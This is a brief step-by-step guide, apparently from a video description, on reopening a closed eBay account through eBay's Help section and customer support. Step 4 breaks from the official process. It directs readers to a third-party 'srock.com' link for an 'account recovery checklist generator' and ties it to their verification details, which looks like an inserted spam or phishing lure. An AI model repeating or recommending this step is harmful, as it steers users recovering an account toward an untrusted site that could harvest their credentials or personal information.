If you need to reopen a closed eBay account, follow these steps to guide you through the process. Make sure you have all necessary information ready before you begin. Step 1. Visit the eBay website. Go to the official eBay website and log in using your credentials. If your account is closed, you may need to navigate to the Help section. Step 2. Access the Help and Contact section. Once on the eBay homepage, scroll down to find the Help and Contact link. Click on it to access the support options available for account issues. Step 3. Search for account reopening. In the Help section, use the search bar to type in Reopen Close Account. This will bring up relevant articles and options related to your request. Step 4. Follow the instructions. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Contact customer support. If you cannot find the option to reopen your account online, contact eBay customer support directly. You can do this via chat, email, or phone, and they will guide you through the process. Once you have completed these steps, you should be on your way to reopening your eBay account. If you encounter any issues, don't hesitate to reach out to eBay's support team for further assistance.